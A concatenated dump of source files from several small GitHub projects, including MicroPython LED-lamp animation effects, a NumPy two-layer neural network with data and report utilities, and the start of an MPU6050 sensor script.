tBAA = tBA + LEFT
tBAB = tBA + RIGHT
tC = tB + UP
tCA = tC + OUT + STRAIGHT
tD = tC + UP
tDA = tD + OUT
tDAA = tDA + LEFT
tE = tD + UP
tEA = tE + RIGHT + LONGSTRAIGHT + DOWN
leds = (
tAA + LEFT + DOWN,
tAA + RIGHT + STRAIGHT + DOWN,
tBAA + UP + LEFT + DOWN,
tBAA + DOWN + STRAIGHT + LEFT + STRAIGHT + DOWN,
tBAB + UP + RIGHT + STRAIGHT + DOWN,
tBAB + DOWN + STRAIGHT + RIGHT + OUT + STRAIGHT + DOWN,
tCA + LEFT + LEFT + STRAIGHT + DOWN,
tCA + LEFT + DOWN + STRAIGHT,
tCA + RIGHT + STRAIGHT + DOWN + STRAIGHT,
tDAA + LEFT + STRAIGHT + DOWN + STRAIGHT,
tDAA + DOWN + LONGSTRAIGHT,
tDA + RIGHT + STRAIGHT + DOWN + LONGSTRAIGHT,
tEA + OUT + DOWN + STRAIGHT,
tEA + LEFT + STRAIGHT + DOWN,
)
print(list(map(lambda led: led.endpoint(), leds)))
lsX = list(map(lambda led: led.x, leds))
lsY = list(map(lambda led: led.y, leds))
lsZ = list(map(lambda led: led.z, leds))
print ("x range: " + str((min(lsX), max(lsX))))
print ("y range: " + str((min(lsY), max(lsY))))
print ("z range: " + str((min(lsZ), max(lsZ))))
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,420
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/baseSweepingEffect.py
|
import time
from .lambdaColor import BaseEffect
from leds import AXIS_RANGES, LedStripControl
from button import Button
from color import Color
from utils import getNewRandomColor
class BaseSweepingEffect(BaseEffect):
ANIMATION_DURATION = 4000
# animationGenerator: Generator
# animation: tuple | None
animationStart: int
def __init__(self, ledStrip: LedStripControl, button: Button) -> None:
super().__init__(ledStrip, button)
def setup(self):
self.animationGenerator = wipingAnimationGenerator()
self.animation = None
self.animationStart = 0
def loop(self):
now = time.ticks_ms()
animationProgress = (now - self.animationStart) / self.ANIMATION_DURATION
if animationProgress > 1 or self.animation is None:
self.animation = next(self.animationGenerator)
self.animationStart = time.ticks_ms()
animationProgress = 0
(axis, isForwards, colors) = self.animation
if not isForwards:
animationProgress = 1 - animationProgress
(min, max) = AXIS_RANGES[axis]
padding = 100
low = min - padding
high = max + padding
position = int((high - low) * animationProgress) + low
self.animateFrame(position, axis, colors, isForwards)
def animateFrame(self, position, axis, colors, isForwards):
pass
def wipingAnimationGenerator():
# An infinite generator that will loop over each axis (x,y,z) in both directions (forward, reverse)
# For each axis/direction a new color will be chosen with the color from the previous wipe being
# used as the background for the next
color = Color.BLACK
while True:
for axis in range(len(AXIS_RANGES)):
for isForwards in (True, False):
bgColor = color # Use previous color as "background" for next wipe
color = getNewRandomColor(color)
yield (axis, isForwards, (color, bgColor))
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,421
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/biColor.py
|
import random
from .lambdaColor import LambdaColor
from leds import LedStripControl
from button import Button
from color import Color
class BiColor(LambdaColor):
def __init__(self, ledStrip: LedStripControl, button: Button, color1, color2) -> None:
def colorGetter(prev):
if prev == Color.BLACK:
return color1 if bool(random.getrandbits(1)) else color2
if prev == color1:
return color2
else:
return color1
super().__init__(ledStrip, button, colorGetter, 1000, 500, 1000)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,422
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/wipePlane.py
|
from .baseSweepingEffect import BaseSweepingEffect
from leds import LED_POSITIONS, NUM_LEDS
from utils import bound, blendChannel
class WipePlane(BaseSweepingEffect):
def animateFrame(self, position, axis, colors, isForwards):
(color, bgColor) = colors
for i in range(NUM_LEDS):
led = LED_POSITIONS[i]
distance = (led[axis] - position)
# How far the transition should extend (should be less than the padding around the axis to avoid
# the animation looking like it didn't complete before moving on)
scaling = 50
foregroundAlpha = bound(distance, 0, scaling) / scaling
if not isForwards:
foregroundAlpha = 1 - foregroundAlpha
finalColor = (
blendChannel(color[0], bgColor[0], foregroundAlpha),
blendChannel(color[1], bgColor[1], foregroundAlpha),
blendChannel(color[2], bgColor[2], foregroundAlpha),
)
self.ledStrip.setLed(i, finalColor)
self.ledStrip.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,423
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/proximaPlane.py
|
from .baseSweepingEffect import BaseSweepingEffect
from leds import LED_POSITIONS, NUM_LEDS
from utils import bound
class ProximaPlane(BaseSweepingEffect):
def animateFrame(self, position, axis, colors, isForwards):
color = colors[0]
for i in range(NUM_LEDS):
led = LED_POSITIONS[i]
distance = abs(position - led[axis]) * 3
scaling = (255 - bound(distance, 0, 255)) / 255
finalColor = (int(color[0] * scaling), int(color[1] * scaling), int(color[2] * scaling))
self.ledStrip.setLed(i, finalColor)
self.ledStrip.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,427
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/datagen.py
|
from utils.models import Element
import numpy as np
import random
train_test_proportion = .80
def generate_random_data(size) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
Randomly generates linearly-separable data, writes it to a file and return as numpy arrays.
:param size: amount of elements in data
:type size: int
:return: the numpy arrays of x and y_hat
"""
with open('data/data.txt', 'w') as f:
data = [Element() for _ in range(size)]
for element in data:
f.write(str(element))
f.close()
return split_data(data)
def read_from_file(path) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
Reads from file and parses data as numpy arrays.
:param path: the path to a file
:type path: str
:return: the numpy arrays of x and y_hat
"""
data = []
try:
with open(path, 'r') as f:
for i, line in enumerate(f):
data.append(Element(line.split(',')[0], line.split(',')[1], line.split(',')[2]))
except IndexError:
print(f'Error when reading from {path} - invalid syntax in line {i + 1}')
exit(1)
f.close()
return split_data(data)
def split_data(data) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
Parses data into X and Y_hat and splits to train and test sets.
:param data: data
:type data: list[Element]
:return: training and testing sets for X and Y_hat
"""
random.shuffle(data)
x = [(float(element.x), float(element.y)) for element in data]
y_hat = [int(element.value) for element in data]
x_train = x[:int((len(x) + 1) * train_test_proportion)]
x_test = x[int((len(x) + 1) * train_test_proportion):]
y_hat_train = y_hat[:int((len(y_hat) + 1) * train_test_proportion)]
y_hat_test = y_hat[int((len(y_hat) + 1) * train_test_proportion):]
return np.array(x_train).T, np.array(x_test).T, np.array(y_hat_train), np.array(y_hat_test)
def read_for_prediction(path) -> np.ndarray:
"""
Reads from file and parses data as a numpy array.
:param path: the path to a file
:type path: str
:return: the numpy array of x
"""
data = []
try:
with open(path, 'r') as f:
for i, line in enumerate(f):
data.append(Element(line.split(',')[0], line.split(',')[1], '0'))
except IndexError:
print(f'Error when reading from {path} - invalid syntax in line {i + 1}')
exit(1)
f.close()
x = [(float(element.x), float(element.y)) for element in data]
return np.array(x).T
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,428
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/neural/__init__.py
|
from .deep import *
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,429
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/__init__.py
|
from .models import *
from .datagen import *
from .reports import *
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,430
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/reports.py
|
from datetime import datetime
def save_report(weights, biases, train_accuracy, test_accuracy, time_elapsed, train_size, test_size,
generations) -> None:
"""
Saves a report to the reports directory.
"""
with open(f'reports/{datetime.now().strftime("%d-%m-%Y-%H-%M-%S")}.txt', 'w') as f:
report = f'****************** The Deep Network Report ******************\n' + \
f'\n' + \
f'Weights:\n'
for ind, weight in enumerate(weights):
report += "W[{}] = {}\n".format(ind, weight)
report += f'\n' + \
f'Bias:\n'
for ind, bias in enumerate(biases):
report += "b[{}] = {}\n".format(ind, bias)
report += f'\n' + \
f'Train accuracy = {train_accuracy}%\n' + \
f'Test accuracy = {test_accuracy}%\n' + \
f'\n' + \
"Time elapsed = {:.4f}ms\n".format(time_elapsed) + \
f'\n' + \
f'Train data size = {train_size} entities\n' + \
f'Test data size = {test_size} entities\n' + \
f'Generations (epochs) of the training = {generations}\n'
f.write(report)
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,431
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/models.py
|
import random
import time
random.seed(time.time())
class Element:
def __init__(self, x=None, y=None, value=None):
self.x = x if x else random.gauss(0, .4)
self.y = y if y else random.gauss(0, .4)
self.value = value if value else self.get_value()
def __str__(self) -> str:
"""
Returns a string representation of an Element instance.
:return: string
"""
return f'{self.x},{self.y},{self.value}\n'
def get_value(self) -> int:
"""
Returns 1 if (x,y) belongs to upper subclass, 0 - if lower.
:return: 1 or 0
"""
return 1 if (self.x * self.x + self.y * self.y) < .25 else 0
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,432
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/neural/deep.py
|
from utils import *
from plotter import plot, graph
import time
import numpy as np
np.random.seed(int(time.time()))
class DeepNetwork:
learning_rate = 0.25
def __init__(self, filepath=None, size=100):
# 2 neurons in the input layer.
# 10 neurons in the hidden layer.
# 1 neuron in the output layer.
self.layer_sizes = [2, 10, 1]
self.weights = []
self.biases = []
for index, layer_size in enumerate(self.layer_sizes):
# Skip initializing for the input layer.
if index == 0:
continue
# Initialize weight matrices and bias vectors.
self.weights.append(np.random.randn(layer_size, self.layer_sizes[index - 1]) * 0.01)
self.biases.append(np.zeros((layer_size, 1)))
if filepath:
self.X, self.X_test, self.Y_hat, self.Y_hat_test = read_from_file(filepath)
else:
self.X, self.X_test, self.Y_hat, self.Y_hat_test = generate_random_data(size)
def train(self):
"""
Trains deep neural network. Saves the results and plots them.
"""
generations = 20000
losses = []
tic = time.time()
for gen in range(generations):
# Forward prop, backward prop and weights correction.
A, cache_results = self.forward_propagation(self.X)
derivatives = self.backward_propagation(cache_results, A)
self.correct_weights(derivatives)
loss = self.loss(self.Y_hat, A)
losses.append(loss)
toc = time.time()
# Gather results after training.
train_accuracy = self.get_accuracy(self.Y_hat, self.predict(self.X))
test_accuracy = self.get_accuracy(self.Y_hat_test, self.predict(self.X_test))
time_elapsed = toc - tic
train_size = self.X.shape[1]
test_size = self.X_test.shape[1]
save_report(self.weights, self.biases, train_accuracy, test_accuracy, time_elapsed, train_size, test_size,
generations)
graph(losses)
X, P = self.get_data_for_decision_boundary()
plot(self.X, self.Y_hat, X, P, 'Train Set')
plot(self.X_test, self.Y_hat_test, X, P, 'Test Set')
def forward_propagation(self, X) -> (np.ndarray, list):
"""
Does forward propagation.
:param X: input data
:type X: numpy array (k,m)
:return: network's output and cached intermediate results
"""
cache_results = []
layers_amount = len(self.weights)
# Iterate over first L-1 layers and do RELU forward propagation.
for index in range(layers_amount - 1):
Z = self.z(self.weights[index], X, self.biases[index])
A = self.relu(Z)
cache_results.append((X, Z))
X = A
# Do the last sigmoid layer separately.
Z = self.z(self.weights[layers_amount - 1], X, self.biases[layers_amount - 1])
A = self.sigmoid(Z)
cache_results.append((X, Z))
return A, cache_results
def backward_propagation(self, cache_results, A) -> list:
"""
Does backward propagation.
:param cache_results: cached results for derivatives calculation
:type cache_results: list
:param A: network's output
:type A: numpy array(1,m)
:return: list of derivatives as tuples
"""
derivatives = []
layers_amount = len(self.weights)
# Do backward propagation for the last sigmoid layer separately.
d_z = A - self.Y_hat
d_w = 1 / d_z.shape[1] * np.dot(d_z, cache_results[layers_amount - 1][0].T)
d_b = 1 / d_z.shape[1] * np.sum(d_z, axis=1, keepdims=True)
d_a = np.dot(self.weights[layers_amount - 1].T, d_z)
derivatives.append((d_w, d_b))
# Iterate over first L-1 layers and do RELU backward propagation.
for layer in reversed(range(layers_amount - 1)):
Z = cache_results[layer][1]
Z[Z < 0] = 0
Z[Z > 0] = 1
d_z = np.multiply(d_a, Z)
d_w = 1 / d_z.shape[1] * np.dot(d_z, cache_results[layer][0].T)
d_b = 1 / d_z.shape[1] * np.sum(d_z, axis=1, keepdims=True)
d_a = np.dot(self.weights[layer].T, d_z)
derivatives.append((d_w, d_b))
return derivatives
def correct_weights(self, derivatives) -> None:
"""
Adds the anti-gradient to the weights and biases.
:param derivatives: tuples with derivatives for respective layers
:type derivatives: list
:return: None
"""
for i in range(len(derivatives)):
self.weights[i] -= self.learning_rate * derivatives[len(derivatives) - i - 1][0]
self.biases[i] -= self.learning_rate * derivatives[len(derivatives) - i - 1][1]
def z(self, W, X, b) -> np.ndarray:
"""
Performs a linear transformation of the data.
:param X: input matrix
:param W: weights matrix
:param b: bias vector
:type X: np.ndarray(n,m)
:type W: np.ndarray(k,n)
:type b: np.ndarray(k,1)
:return: the numpy array(k,m) of linear transforms
"""
return np.dot(W, X) + b
def relu(self, Z) -> np.ndarray:
"""
Applies the RELU to the Z array.
:param Z: linear transforms Z of the data
:type Z: np.ndarray(k,m)
:return: the numpy array(k,m) of RELU images
"""
Z[Z < 0] = 0
return Z
def sigmoid(self, Z) -> np.ndarray:
"""
Applies the sigmoid to the Z array.
:param Z: linear transforms Z of the data
:type Z: np.ndarray(k,m)
:return: the numpy array(k,m) of sigmoid images
"""
return 1 / (1 + np.exp(-Z))
def loss(self, Y_hat, Y) -> float:
"""
Calculates cross-entropy averaged across a generation.
:param Y_hat: the real values
:type Y_hat: np.ndarray(1,n)
:param Y: network's guessed values
:type Y: np.ndarray(1,n)
:return: averaged cross-entropy
"""
Y_hat = Y_hat.reshape(1, Y_hat.shape[0])
return np.sum(-Y_hat * np.log(Y + 1e-5) - (1 - Y_hat) * np.log(1 - Y + 1e-5)) / Y.shape[1]
def predict(self, X) -> np.ndarray:
"""
Processes the data on the trained network and returns a prediction array.
:param X: input layer data
:type X: np.ndarray(m,n)
:return: prediction P array for X
"""
Y, _ = self.forward_propagation(X)
P = np.array([1 if y > 0.5 else 0 for y in Y[0]])
return P
def get_accuracy(self, Y_hat, P) -> float:
"""
Compares values of Y_hat and P and returns accuracy in %.
:param Y_hat: the real values
:type Y_hat: np.ndarray(1,m)
:param P: network's predicted values
:type P: np.ndarray(1,m)
:return: accuracy of the P
"""
return (1 - np.sum(np.abs(Y_hat - P)) / Y_hat.shape[0]) * 100
def get_data_for_decision_boundary(self) -> (np.ndarray, np.ndarray):
"""
Returns X - an array of all points in [-1;1] x [-1;1] grid square.
Returns P - an array of predictions for the array X.
This data is used to plot the decision boundary.
"""
x, y, X = -1., -1., []
for i in range(200):
for j in range(200):
X.append([x, y])
x += 0.01
x = -1.
y += 0.01
X = np.array(X).T
P = self.predict(X)
return X, P
def predict_from_file(self, filepath):
"""
Predicts for the data in <filepath>.
:param filepath: path of the file
:type filepath: string
"""
X = read_for_prediction(filepath)
P = self.predict(X)
print(f'Prediction array for [{filepath}]:\n{P}')
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,433
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/run.py
|
from neural import DeepNetwork
deep_network = DeepNetwork(size=100)
deep_network.train()
deep_network.predict_from_file('data/predict.txt')
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,434
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/plotter/graph.py
|
import matplotlib.pyplot as plt
def plot(X, Y, Xp, Pp, title):
"""
Plots the data and decision boundary.
"""
scatter(Xp.T.tolist(), Pp.T.tolist(), '#FDE8D2', '#D0E9E9', title)
scatter(X.T.tolist(), Y.tolist(), '#ff9933', '#00e6e6', title)
plt.show()
def scatter(X, Y, color1, color2, title):
"""
Scatters the points from X and Y on the plot.
"""
x_orange = []
y_orange = []
x_blue = []
y_blue = []
for ind, x in enumerate(X):
if Y[ind]:
x_orange.append(x[0])
y_orange.append(x[1])
else:
x_blue.append(x[0])
y_blue.append(x[1])
axes = plt.gca()
axes.set_xlim([-1, 1])
axes.set_ylim([-1, 1])
plt.scatter(x_orange, y_orange, c=color1, s=15)
plt.scatter(x_blue, y_blue, c=color2, s=15)
plt.xlabel('x')
plt.ylabel('y')
plt.title(title)
def graph(losses):
"""
Plots the graph of the loss function.
"""
axes = plt.gca()
axes.set_xlim([0, 20000])
axes.set_ylim([0, 1])
plt.plot(losses, c='r')
plt.show()
|
{"/utils/datagen.py": ["/utils/models.py"], "/neural/__init__.py": ["/neural/deep.py"], "/utils/__init__.py": ["/utils/models.py", "/utils/datagen.py", "/utils/reports.py"], "/neural/deep.py": ["/utils/__init__.py"], "/run.py": ["/neural/__init__.py"]}
|
34,435
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/data_requests.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 18:16:41 2018
@author: James
"""
import requests
import pandas as pd
import matplotlib.pyplot as plt
import re
import numpy as np
def make_request(ticker, function = 'TIME_SERIES_DAILY',
api_key = '',
outputsize = 'compact',
**kwargs):
"""
makes a request to alpha vantage api
returns pandas dataframe
"""
if not api_key:
api_key = read_key()
url = "https://www.alphavantage.co/query"
params = {'symbol' : ticker,
'function' : function,
'apikey' : api_key,
'outputsize' : outputsize}
params = {**params, **kwargs}
results = requests.get(url, params = params)
if not results:
return None
results = results.json()
time_series = results['Time Series (Daily)']
datas = [time_series[time_point] for time_point in time_series]
time_points = [pd.to_datetime(time_point) for time_point in time_series]
df = pd.DataFrame(datas, time_points, dtype = float)
if time_points[0] > time_points[1]:
df = df.reindex(index=df.index[::-1])
for column in df.columns:
new_column = re.sub(r'\d.\s+', '', column)
df.rename(columns = {column : new_column}, inplace = True)
return df
def read_key():
""" Reads text sring from apikey.txt"""
with open('apikey.txt') as txt_file:
data = txt_file.read()
return data
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,436
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/analysis_methods.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 14 18:20:17 2018
@author: James
"""
import numpy as np
import matplotlib.pyplot as plt
def percent_match(col = 'adjusted close', df = None,
window = 5, offset = 0):
"""
Get the trend of the last 10 days.
Compare against the last X years of data.
Keep the top 20% of matches. If there's a >50% chance of
increase in money then buy. If there's a > 50% chance of
loss then short.
"""
w_df = df[col]
if offset:
w_df = w_df[0 : offset]
number_of_days = (252 * 4) #5years
w_df = w_df.pct_change()
w_df = w_df.replace([np.inf, -np.inf], np.nan)
w_df = w_df.dropna()
working_array = w_df[-window::]
cut_off = w_df.mean()
index = 0
scores = {}
all_scores = []
plt.plot(np.arange(len(working_array)), working_array)
for time in w_df[-number_of_days : -window]:
test_array = w_df[index: index + window]
try:
score = __abs_difference(test_array, working_array)
next_day = w_df[index+1]
diff = next_day - time
if np.abs(diff) > cut_off:
scores[index] = {'score' : score, 'Dir': diff > 0, 'points':test_array} #True = increase, False = decrease
all_scores.append(score)
plt.plot(np.arange(len(working_array)), test_array)
except ValueError as e:
print(e)
index += 1
all_scores = np.array(all_scores)
top_lot = np.percentile(all_scores, 25)
final_counts = {'up' : 0, 'down' : 0}
for index in scores:
score = scores[index]['score']
if score <= top_lot:
if scores[index]['Dir']:
final_counts['up'] += 1
else:
final_counts['down'] += 1
plt.plot(np.arange(len(working_array)), scores[index]['points'])
return final_counts
def __abs_difference(arr1, arr2):
if (arr1 == 0).any():
raise ValueError('Has a zero' + str(arr1))
if(arr2 == 0).any():
raise ValueError('Has a zero' + str(arr2))
return np.sum(np.abs(arr1-arr2))
def follow_trend(df, col = 'adjusted close', big_range = 30 , small_range = 10):
"""
If average of a recent number of days (small range) is
higher than the average of a longer period of days (long range)
then trend is up (buy), if it's below then rend is down (short)
"""
w_df = df[col]
av_small_range = w_df[-small_range::].mean()
av_big_range = w_df[-big_range::].mean()
results = {'Ratio': av_small_range / av_big_range}
if av_small_range > av_big_range:
results['Trend'] = 'up'
else:
results['Trend' ] = 'down'
return results
if __name__ == '__main__':
import data_requests
#df = data_requests.make_request('^FTSE', 'TIME_SERIES_DAILY_ADJUSTED',
#outputsize = 'full')
results = follow_trend(df)
print(results)
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,437
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/old/analyse.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 14 18:21:00 2018
@author: James
"""
import data_requests
import analysis_methods
df = data_requests.make_request('^FTSE', 'TIME_SERIES_DAILY_ADJUSTED',
outputsize = 'full')
s = analysis_methods.percent_match('D' , df = df, offset = -5)
#plt.plot(df['open'])
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,438
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/retrieve_stock_data.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 27 14:03:15 2021
@author: james
"""
#stocks available: https://globefunder.com/revolut-stocks-list/
import yfinance as yf
import datetime
import shelve
import re
from dataclasses import dataclass
@dataclass
class stock:
"""Class to represent a particular company"""
company: str = ''
symbol: str = ''
price: str = ''
market_cap: str = ''
sector: str = ''
industry: str = ''
market: str = ''
"""
def __init__(self):
self.company = ''
self.symbol = ''
self.price = ''
self.market_cap = ''
self.sector = ''
self.industry = ''
self.market = ''
"""
def read_available_stocks():
"""
Read the list of stocks in Revolut stocks list.csv
"""
stocks = {}
with open('Revolut Stocks List - Revolut stocks list.csv', 'r') as csv_file:
csv_file.readline()
#remove all commas that are part of numbers
for line in csv_file:
results = re.findall(r'\$\d+,\d', line)
if len(results) > 0:
for result in results:
wo_comma = result.replace(',', '')
line = line.replace(result, wo_comma)
results = re.findall(r'\d,\d', line)
if len(results) > 0:
for result in results:
wo_comma = result.replace(',', '')
line = line.replace(result, wo_comma)
split_line = line.split(',')
this_stock = stock()
this_stock.company = split_line[1]
this_stock.symbol = split_line[2]
this_stock.price = split_line[3]
this_stock.market_cap = split_line[4]
this_stock.sector = split_line[5]
this_stock.industry = split_line[6]
this_stock.market = split_line[7]
stocks[this_stock.company] = this_stock
return stocks
def get_data(stock, months = 0, weeks = 0, days = 0):
"""Request the data from yfinance"""
dt = get_past_datetime_ago(months, weeks, days)
df = yf.download(stock.symbol, start=dt, progress=False)
return df
def get_past_datetime_ago(months, weeks, days):
"""Get datetime from the number of months, weeks, and days before now"""
days_per_month = 365/12
total_days = months * days_per_month
total_days += (weeks * 7)
total_days += days
dt = datetime.datetime.now() - datetime.timedelta(total_days)
return dt
def get_all_dfs(stocks, months):
"""Try to retrieve all the data for every stock"""
dfs = {}
count = 0
total = len(stocks)
for company in stocks:
try:
stock = stocks[company]
df = get_data(stock, months)
dfs[stock.company] = df
except Exception as e:
print(f"Error getting {stock.company}:{e}")
print(f"count: {count}")
count+=1
if count % 20 == 0:
print(f"Done {count} or {total}")
return dfs
def get_all_data_frames(new_data = False, months = 18):
"""
Get dataframes of all stocks. If new_data then we actually
reques the data from yfinance. Otherwise we used saved data
"""
if new_data:
stocks = read_available_stocks()
dfs = get_all_dfs(stocks, 18)
with shelve.open('stocks') as db:
db['stocks'] = stocks
db['dfs'] = dfs
else:
with shelve.open('stocks') as db:
stocks = db['stocks']
dfs = db['dfs']
return dfs, stocks
def plot(company, dfs):
dfs[company]['Adj Close'].plot()
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,439
|
JamesLaw86/finance_tools
|
refs/heads/master
|
/analyse_stock_data.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 27 14:03:15 2021
@author: james
"""
import retrieve_stock_data as rsd
import numpy as np
def get_biggest_changes(dfs, days = -1):
"""
Get the stocks that have changed the most in the given timeframe
based on the average over the given period.
Note wer'e assuming dataframe is in period of days
"""
percent_changes = get_percentage_changes(dfs, days)
most_increased, most_decreased = determine_biggest_changes(percent_changes)
return most_increased, most_decreased
def get_percentage_changes(dfs, days):
"""
Calculate the amount all stocks have changed over the given period
"""
changes = {}
for company in dfs:
df = dfs[company]
close_prices = df['Adj Close']
if(len(close_prices)) ==0:
continue
if days != -1:
length = len(close_prices)
close_prices = close_prices[(length - days)::]
try:
mean = close_prices.mean()
cur = close_prices[len(close_prices)-1]
per = (cur - mean)/mean * 100
changes[company] = per
except Exception as e:
print(f"Error getting {company}:{e}")
return changes
def determine_biggest_changes(changes):
"""
Retrieve a list of the companies that have changed the most based on
the calculated percentage change. Returns sepearte lists of those that
have increased the most and those that have decreased
"""
list_companies = [company for company in changes]
list_changes = [changes[change] for change in changes]
arr_changes = np.array(list_changes)
indexes = np.argsort(arr_changes)
decreases = [list_companies[i] for i in indexes[0:20]]
increases = [list_companies[i] for i in indexes[::-1][0:20]]
return increases, decreases
dfs, stocks = rsd.get_all_data_frames()
most_increased, most_decreased = get_biggest_changes(dfs, 6*30)
|
{"/analyse_stock_data.py": ["/retrieve_stock_data.py"]}
|
34,442
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0020_stream_to_file.py
|
#!/usr/bin/python
import smbus
import numpy as np
import helpers as helpers
import time
